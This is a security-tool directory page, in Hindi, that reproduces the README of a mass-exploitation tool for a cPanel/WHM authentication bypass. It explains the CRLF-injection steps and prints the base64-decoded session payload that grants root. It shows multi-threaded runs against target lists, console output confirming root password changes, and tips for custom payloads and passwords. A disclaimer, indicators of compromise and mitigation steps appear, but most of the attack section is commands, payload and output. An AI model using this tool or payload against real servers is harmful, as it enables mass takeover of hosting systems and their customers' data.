Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — cPanel/WHM पर CVE-2026-41940 के लिए बल्क स्कैनर और सामूहिक शोषण उपकरण, स्वचालित लक्ष्य सत्यापन और उच्च-गति मल्टी-थ्रेडेड निष्पादन के लिए निर्मित। | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-41940
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंगपेलोड डेवलपमेंट
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

cPanel/WHM पर CVE-2026-41940 के लिए बल्क स्कैनर और सामूहिक शोषण उपकरण, स्वचालित लक्ष्य सत्यापन और उच्च-गति मल्टी-थ्रेडेड निष्पादन के लिए निर्मित।

442 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-41940 - WHM/cPanel प्रमाणीकरण बायपास मास एक्सप्लॉइट

43153

📋 विवरण

CVE-2026-41940 WHM/cPanel में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो हमलावरों को वैध क्रेडेंशियल के बिना प्रमाणीकरण को बायपास करने और सर्वर पर रूट एक्सेस प्राप्त करने की अनुमति देती है। यह भेद्यता सत्र प्रबंधन तंत्र में CRLF इंजेक्शन का लाभ उठाकर दुर्भावनापूर्ण सत्र पैरामीटर इंजेक्ट करती है।

यह टूल एक साथ कई लक्ष्यों के परीक्षण के लिए मल्टी-थ्रेडिंग समर्थन के साथ मास एक्सप्लॉइटेशन क्षमताएँ प्रदान करता है, जिसमें बुद्धिमान सफलता पहचान और अमान्य लक्ष्यों की स्वचालित फ़िल्टरिंग शामिल है।


🎯 मुख्य विशेषताएँ

विशेषताविवरण
✅ मास एक्सप्लॉइटेशनसूची फ़ाइल से कई लक्ष्यों को स्कैन और एक्सप्लॉइट करें
🚀 मल्टी-थ्रेडिंगतेज़ स्कैनिंग के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या (डिफ़ॉल्ट: 15)
🔐 स्वचालित पासवर्ड परिवर्तनसफल एक्सप्लॉइट पर रूट पासवर्ड को Jenderal92 में बदलता है
🛡️ स्मार्ट सफलता पहचानविभिन्न WHM API प्रतिक्रिया प्रारूपों का स्वचालित रूप से पता लगाता है
⚠️ लाइसेंस त्रुटि फ़िल्टरिंगअमान्य/लाइसेंस नहीं पढ़ सकता त्रुटियों वाले लक्ष्यों को बाहर करता है
📝 संरचित आउटपुटकेवल पुष्टि किए गए सफल परिणामों को `domain:port
🛡️ SSL/TLS समर्थनस्व-हस्ताक्षरित प्रमाणपत्रों को स्वचालित रूप से संभालता है
🔄 सत्र प्रबंधनस्वचालित सत्र निष्कर्षण, कुकी इंजेक्शन और टोकन हैंडलिंग
⏱️ टाइमआउट नियंत्रणकॉन्फ़िगर करने योग्य कनेक्शन टाइमआउट (डिफ़ॉल्ट: 15 सेकंड)
🔍 पूर्व-कनेक्शन जाँचएक्सप्लॉइटेशन प्रयास से पहले पोर्ट उपलब्धता सत्यापित करता है
📊 रीयल-टाइम प्रगतिप्रत्येक एक्सप्लॉइटेशन चरण के लिए विस्तृत प्रगति दिखाता है

📦 आवश्यकताएँ

  • Python 2.7 (आवश्यक - Python 3.x के साथ संगत नहीं)
  • लक्ष्य एक्सेस के लिए इंटरनेट कनेक्शन
  • आवश्यक Python पैकेज:
root@kitploit:~
pip install requests urllib3 futures

या requirements.txt का उपयोग करें:

root@kitploit:~
requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 इंस्टॉलेशन

root@kitploit:~
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Install dependencies
pip install -r requirements.txt

# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 उपयोग

1. लक्ष्य फ़ाइल तैयार करें

targets.txt फ़ाइल बनाएँ जिसमें प्रत्येक पंक्ति में एक लक्ष्य हो:

root@kitploit:~
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

नोट: पोर्ट 2087 डिफ़ॉल्ट WHM पोर्ट है। यदि निर्दिष्ट नहीं है, तो यह स्वचालित रूप से पोर्ट 2087 का उपयोग करेगा। यदि HTTP/HTTPS उपसर्ग गायब है तो इसे स्वचालित रूप से जोड़ा जाएगा।

2. एक्सप्लॉइट चलाएँ

मूल उपयोग (डिफ़ॉल्ट सेटिंग्स)

root@kitploit:~
python2 CVE-2026-41940.py targets.txt

मल्टी-थ्रेडेड उपयोग

root@kitploit:~
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5

# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20

कस्टम होस्टनाम

root@kitploit:~
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

कस्टम टाइमआउट

root@kitploit:~
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 कमांड लाइन तर्क


📁 आउटपुट प्रारूप

परिणाम फ़ाइल (res.txt)

केवल पुष्टि किए गए सफल एक्सप्लॉइट सहेजे जाते हैं। लाइसेंस त्रुटियों, असफल पासवर्ड परिवर्तन या कनेक्शन समस्याओं वाले लक्ष्य स्वचालित रूप से बाहर कर दिए जाते हैं।

प्रारूप:

root@kitploit:~
domain:port|root|Jenderal92

उदाहरण आउटपुट:

root@kitploit:~
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

बाहर किए गए परिदृश्य

निम्नलिखित लक्ष्य res.txt में नहीं सहेजे जाएँगे:

  • लाइसेंस त्रुटियाँ (Cannot Read License File)
  • असफल पासवर्ड परिवर्तन
  • कनेक्शन टाइमआउट या अस्वीकृति
  • पैच किए गए/बिना WHM वाले लक्ष्य
  • गलत क्रेडेंशियल या सत्र विफलताएँ

कंसोल आउटपुट

root@kitploit:~
$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 एक्सप्लॉइट कैसे काम करता है

एक्सप्लॉइट में बुद्धिमान सत्यापन के साथ 4 मुख्य चरण शामिल हैं:

चरण 1: पूर्व-प्रमाणीकरण सत्र

root@kitploit:~
[1] minting a preauth session...
  • अमान्य क्रेडेंशियल के साथ /login/?login_only=1 पर POST अनुरोध भेजता है
  • सर्वर प्रतिक्रिया से whostmgrsession कुकी प्राप्त करता है
  • अंतिम ,<obhex> भाग को हटाकर सत्र आधार निकालता है
  • यह हमें काम करने के लिए एक मान्य सत्र प्रारूप देता है

चरण 2: CRLF इंजेक्शन हमला

root@kitploit:~
[2] sending the CRLF injection...
  • दुर्भावनापूर्ण पेलोड वाले Authorization: Basic हेडर के साथ GET अनुरोध भेजता है
  • Base64 पेलोड निम्न में डिकोड होता है:
    root@kitploit:~
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • CRLF (\r\n) वर्ण नकली सत्र पैरामीटर इंजेक्ट करते हैं
  • यह सर्वर को यह सोचने के लिए धोखा देता है कि प्रमाणीकरण सफल था
  • सर्वर HTTP 307 और cp_security_token युक्त Location हेडर के साथ प्रतिक्रिया करता है

चरण 3: सत्र प्रसार

root@kitploit:~
[3] firing do_token_denied to propagate...
  • हेरफेर की गई कुकी के साथ /scripts2/listaccts एंडपॉइंट तक पहुंचता है
  • WHM में do_token_denied तंत्र को ट्रिगर करता है
  • यह इंजेक्ट किए गए सत्र पैरामीटर को सर्वर के सत्र कैश में प्रसारित करता है
  • "Token denied" के साथ HTTP 401 प्रतिक्रिया सफल प्रसार की पुष्टि करती है

चरण 4: सत्यापन और पासवर्ड परिवर्तन

root@kitploit:~
[4] verifying we're WHM root...
  • रूट-स्तरीय एक्सेस सत्यापित करने के लिए /json-api/version तक पहुंचता है
  • रूट पासवर्ड को Jenderal92 में बदलने के लिए /json-api/passwd API को कॉल करता है
  • कई WHM API प्रतिक्रिया प्रारूपों में सफलता का बुद्धिमानी से पता लगाता है:
    • {"metadata": {"result": 1}} (cPanel v11.118+)
    • {"status": 1} (पुराने संस्करण)
    • {"result": [{"status": 1}]} (विरासत प्रारूप)
    • टेक्स्ट-आधारित सफलता संदेश

स्वचालित फ़िल्टरिंग

टूल स्वचालित रूप से बाहर करता है:

  • लाइसेंस त्रुटियाँ: {"status": 0, "statusmsg": "Cannot Read License File"}
  • असफल पासवर्ड परिवर्तन: जब API सफलता कोड लौटाता है लेकिन पासवर्ड नहीं बदला जाता
  • कनेक्शन समस्याएँ: टाइमआउट, अस्वीकृत कनेक्शन, अनुपलब्ध होस्ट

🛡️ पहचान और शमन

समझौते के संकेतक (IOC)

निगरानी के लिए लॉग

root@kitploit:~
# WHM access log
/usr/local/cpanel/logs/access_log

# cPanel error log  
/usr/local/cpanel/logs/error_log

# Authentication log
/var/log/secure

# System messages
/var/log/messages

शमन चरण

  1. WHM/cPanel को तुरंत नवीनतम पैच किए गए संस्करण में अपडेट करें

    root@kitploit:~
    /usr/local/cpanel/scripts/upcp
    
  2. सभी खातों के लिए टू-फैक्टर प्रमाणीकरण (2FA) सक्षम करें, विशेष रूप से रूट के लिए

    root@kitploit:~
    WHM → Security Center → Two-Factor Authentication
    
  3. IP व्हाइटलिस्टिंग के साथ WHM एक्सेस प्रतिबंधित करें

    root@kitploit:~
    WHM → Security Center → Host Access Control
    
  4. संदिग्ध पैटर्न के लिए नियमित रूप से एक्सेस लॉग की निगरानी करें

    root@kitploit:~
    tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
    
  5. समझौते का संदेह होने पर सभी पासवर्ड बदलें

  6. पोर्ट 2087 तक पहुंच को प्रतिबंधित करने के लिए फ़ायरवॉल नियमों का उपयोग करें

    root@kitploit:~
    # Allow only trusted IPs
    iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
    iptables -A INPUT -p tcp --dport 2087 -j DROP
    
    # Or use CSF/LFD firewall
    csf -a YOUR_TRUSTED_IP
    
  7. CRLF इंजेक्शन प्रयासों का पता लगाने के लिए WAF नियम लागू करें

  8. WHM/cPanel इंस्टॉलेशन की नियमित सुरक्षा ऑडिट


📝 विभिन्न परिदृश्यों में उपयोग उदाहरण

परिदृश्य 1: एकल लक्ष्य परीक्षण

root@kitploit:~
echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1

परिदृश्य 2: बल्क सर्वर ऑडिट

root@kitploit:~
python2 CVE-2026-41940.py all_servers.txt --threads 20 --timeout 20

परिदृश्य 3: धीमा नेटवर्क/लंबी दूरी

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --threads 5 --timeout 45

परिदृश्य 4: प्रॉक्सी/लोड बैलेंसर के पीछे कस्टम होस्टनाम

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --hostname internal.cpanel.server --threads 10

परिदृश्य 5: मिश्रित पोर्ट लक्ष्य

root@kitploit:~
# targets.txt can contain various formats:
https://server1.com:2087
http://server2.com:2087
server3.com:2087
127.0.0.1:2087
10.0.0.50

# All will be normalized automatically
python2 CVE-2026-41940.py targets.txt --threads 15

⚙️ समस्या निवारण

त्रुटि: "module 'urllib' has no attribute 'urlsplit'"

समस्या: Python 2.7 के बजाय Python 3 का उपयोग कर रहे हैं
समाधान: इस टूल के लिए विशेष रूप से Python 2.7 की आवश्यकता है।

root@kitploit:~
# Check Python version
python2 --version  # Must show Python 2.7.x

# Run with python2 explicitly
python2 CVE-2026-41940.py targets.txt

त्रुटि: "Connection refused - target unreachable"

समस्या: लक्ष्य ऑफ़लाइन है या फ़ायरवॉल ब्लॉक कर रहा है
समाधान:

root@kitploit:~
# Test manually
telnet target.com 2087
nmap -p 2087 target.com
curl -k https://target.com:2087

त्रुटि: "/login didn't issue a whostmgrsession cookie"

समस्या: लक्ष्य पैच किया जा सकता है या WHM नहीं चला रहा है
समाधान:

  • सत्यापित करें कि लक्ष्य WHM/cPanel चला रहा है
  • जांचें कि लक्ष्य ब्राउज़र के माध्यम से https://target:2087 पर पहुंच योग्य है या नहीं
  • लक्ष्य पर CVE-2026-41940 पैच पहले से लागू हो सकता है

धीमी स्कैनिंग प्रदर्शन

समाधान: थ्रेड संख्या और टाइमआउट समायोजित करें

root@kitploit:~
# For many targets with good connectivity
python2 CVE-2026-41940.py targets.txt --threads 30 --timeout 10

# For unreliable connections
python2 CVE-2026-41940.py targets.txt --threads 5 --timeout 45

आउटपुट में लाइसेंस त्रुटियाँ

नोट: Cannot Read License File दिखाने वाले लक्ष्य स्वचालित रूप से res.txt से बाहर कर दिए जाते हैं। यह अपेक्षित व्यवहार है क्योंकि बिना लाइसेंस वाले WHM इंस्टॉलेशन पर पासवर्ड परिवर्तन काम नहीं करेंगे।


🔧 उन्नत कॉन्फ़िगरेशन

कस्टम पेलोड संशोधन

आप कस्टम सत्र पैरामीटर के लिए PAYLOAD_B64 संशोधित कर सकते हैं:

root@kitploit:~
import base64

# Custom payload
payload = """root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1"""

encoded = base64.b64encode(payload.encode())
print(encoded)

कस्टम पासवर्ड

do_passwd() फ़ंक्शन (लाइन ~280) में पासवर्ड बदलें:

root@kitploit:~
{"user": "root", "password": "YourCustomPassword123"}

सफलता पहचान समायोजित करना

कस्टम WHM प्रतिक्रिया प्रारूपों का पता लगाने के लिए do_passwd() फ़ंक्शन को संशोधित किया जा सकता है:

root@kitploit:~
# Add custom pattern in do_passwd()
if 'your_custom_success_string' in (r.text or '').lower():
    return "success"

🤝 योगदान

योगदान का स्वागत है! कृपया इन चरणों का पालन करें:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर शाखा बनाएं (git checkout -b feature/AmazingFeature)
  3. अपने परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
  4. शाखा को पुश करें (git push origin feature/AmazingFeature)
  5. एक पुल रिक्वेस्ट खोलें

विकास दिशानिर्देश

  • Python 2.7 संगतता बनाए रखें
  • विभिन्न WHM/cPanel संस्करणों के साथ परीक्षण करें
  • उचित त्रुटि हैंडलिंग जोड़ें
  • नई सुविधाओं के लिए दस्तावेज़ीकरण अपडेट करें

⭐ स्टार इतिहास

यदि यह टूल आपके सुरक्षा अनुसंधान के लिए उपयोगी है, तो कृपया इसे GitHub पर एक ⭐ दें!

Star History Chart


❗ FAQ

प्रश्न: क्या इस टूल का पता लगाया जा सकता है?
उत्तर: हाँ, यह टूल WHM/cPanel एक्सेस लॉग में निशान छोड़ता है। केवल उचित प्राधिकरण के साथ और वैध सुरक्षा परीक्षण के लिए उपयोग करें।

प्रश्न: एक्सप्लॉइटेशन में कितना समय लगता है?
उत्तर: नेटवर्क विलंबता और सर्वर प्रतिक्रिया समय के आधार पर प्रति लक्ष्य लगभग 5-15 सेकंड।

प्रश्न: क्या इसके लिए पूर्व रूट एक्सेस की आवश्यकता होती है?
उत्तर: नहीं, यह एक्सप्लॉइट बिना किसी प्रमाणीकरण के पूरी तरह से बाहरी रूप से काम करता है।

प्रश्न: क्या यह टूल Windows पर काम करता है?
उत्तर: हाँ, जब तक Python 2.7 ठीक से स्थापित और कॉन्फ़िगर किया गया है।

प्रश्न: मेरा लक्ष्य एक अलग पोर्ट का उपयोग करता है, मुझे क्या करना चाहिए?
उत्तर: लक्ष्य URL में पोर्ट निर्दिष्ट करें: cPanel के लिए https://target.com:2083 या कोई कस्टम पोर्ट।

प्रश्न: कुछ लक्ष्य res.txt में क्यों नहीं सहेजे जाते, भले ही एक्सप्लॉइट काम कर गया हो?
उत्तर: टूल केवल उन लक्ष्यों को सहेजता है जहां पासवर्ड सफलतापूर्वक बदला गया था। लाइसेंस त्रुटियों, असफल पासवर्ड परिवर्तन या अन्य समस्याओं वाले लक्ष्य बाहर कर दिए जाते हैं, भले ही प्रमाणीकरण बायपास सफल रहा हो।

प्रश्न: कौन से WHM/cPanel संस्करण कमजोर हैं?
उत्तर: CVE-2026-41940 पैच से पहले के संस्करण। पैच किए गए संस्करण के लिए cPanel का चेंजलॉग देखें।


📌 महत्वपूर्ण नोट्स

  • ✅ यह टूल सफल एक्सप्लॉइटेशन पर रूट पासवर्ड को Jenderal92 में बदलता है
  • 📡 डिफ़ॉल्ट WHM पोर्ट 2087 है (निर्दिष्ट नहीं होने पर स्वचालित रूप से उपयोग किया जाता है)
  • 🔒 स्व-हस्ताक्षरित प्रमाणपत्रों का समर्थन करने के लिए SSL प्रमाणपत्र सत्यापन अक्षम है
  • 💾 केवल पुष्टि किए गए सफल परिणाम (पासवर्ड बदला गया) res.txt में सहेजे जाते हैं
  • ⚠️ लाइसेंस त्रुटियाँ और असफल पासवर्ड परिवर्तन स्वचालित रूप से फ़िल्टर हो जाते हैं
  • 🔄 प्रत्येक रन एक नई res.txt फ़ाइल बनाता है (पुराने परिणाम हटा दिए जाते हैं)
  • 🌐 लक्ष्यों में उपसर्ग गायब होने पर HTTP/HTTPS उपसर्ग स्वचालित रूप से जोड़ा जाता है
  • 🧵 डिफ़ॉल्ट थ्रेड संख्या 15 है, सिस्टम क्षमताओं के आधार पर समायोज्य

शैक्षिक सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया
जिम्मेदारी से उपयोग करें, कानूनी रहें, नैतिक रहें


⚠️ अस्वीकरण

⚠️ गंभीर चेतावनी!

यह टूल विशेष रूप से निम्नलिखित के लिए बनाया गया था:

  • ✅ शैक्षिक उद्देश्य और सुरक्षा अनुसंधान
  • ✅ अधिकृत पेनेट्रेशन परीक्षण
  • ✅ उन प्रणालियों पर सुरक्षा मूल्यांकन जिनके आप स्वामी हैं
  • ✅ लिखित अनुमति के साथ भेद्यता सत्यापन

सख्त रूप से निषिद्ध उपयोग:

  • ❌ स्पष्ट प्राधिकरण के बिना प्रणालियों तक पहुंचना
  • ❌ किसी भी प्रकार की अवैध गतिविधियाँ
  • ❌ दुर्भावनापूर्ण कार्य या प्रणालियों को नुकसान पहुंचाना
  • ❌ किसी भी कंप्यूटर प्रणाली तक अनधिकृत पहुंच
  • ❌ किसी भी स्थानीय, राज्य या संघीय कानून का उल्लंघन

लेखक इस टूल के उपयोग से उत्पन्न किसी भी दुरुपयोग, क्षति या परिणामों के लिए कोई जिम्मेदारी या दायित्व नहीं लेते हैं। इस टूल का उपयोग करके, आप सहमत हैं कि आप इसका उपयोग केवल उन प्रणालियों पर करेंगे जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित प्राधिकरण है।

यदि आप आगे बढ़ते हैं, तो आप स्वीकार करते हैं कि:

  1. आपके पास लक्ष्य प्रणालियों के परीक्षण का प्राधिकरण है
  2. आप अनधिकृत पहुंच के कानूनी निहितार्थों को समझते हैं
  3. आप सभी लागू कानूनों और विनियमों का पालन करेंगे
  4. लेखक आपके कार्यों के लिए जिम्मेदार नहीं हैं

अधिक अस्वीकरण के लिए आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं

टूल डाउनलोड करें
तर्कविवरणडिफ़ॉल्टआवश्यक
list_fileलक्ष्य सूची वाली फ़ाइल (प्रति पंक्ति एक)-✅ हाँ
--threadsसमवर्ती थ्रेड की संख्या15❌ नहीं
--hostnameसभी लक्ष्यों के लिए Host हेडर ओवरराइड करेंस्वतः पता लगाना❌ नहीं
--timeoutसेकंड में कनेक्शन टाइमआउट15❌ नहीं
संकेतकविवरण
असामान्य whostmgrsession कुकीउचित प्रमाणीकरण के बिना असामान्य कुकी पैटर्न
हेडर में CRLF वर्णHTTP हेडर में \r\n अनुक्रमों का पता लगाना
/scripts2/listaccts एक्सेसइस पथ तक अनधिकृत पहुंच
पासवर्ड Jenderal92इस विशिष्ट पासवर्ड का उपयोग करके सफल लॉगिन
cpsess टोकन रिसावLocation हेडर में दिखाई देने वाला सुरक्षा टोकन
विफल लॉगिन के बाद सफलतागलत पासवर्ड के साथ /login/?login_only=1 पर POST, फिर विशेषाधिकार प्राप्त पहुंच